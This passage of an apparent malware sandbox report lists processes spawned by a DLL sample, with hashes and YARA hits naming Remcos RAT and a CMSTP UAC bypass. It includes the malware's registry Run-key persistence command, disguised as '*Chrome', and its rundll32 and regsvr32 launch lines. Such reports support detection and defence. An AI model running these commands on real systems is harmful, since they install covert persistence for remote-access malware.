                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
                                    Imagebase:0x330000
                                    File size:20'992 bytes
                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:06:14:14
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:06:14:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:06:14:18
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:06:14:21
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:06:15:00
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:06:15:01
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:false

                                    Target ID:13
                                    Start time:06:15:01
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:06:15:02
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:06:15:03
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\regsvr32.exe"
                                    Imagebase:0x330000
                                    File size:20'992 bytes
                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:16
                                    Start time:06:15:03
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
                                    Imagebase:0xec0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:06:15:04
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:18
                                    Start time:06:15:05
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Target ID:19
                                    Start time:06:15:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0x7ff6c4fc0000
                                    File size:71'680 bytes
                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:06:15:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:21
                                    Start time:06:15:23
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0x7ff6c4fc0000
                                    File size:71'680 bytes
                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:06:15:23
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:24
                                    Start time:06:15:34
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    Target ID:25
                                    Start time:06:15:42
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
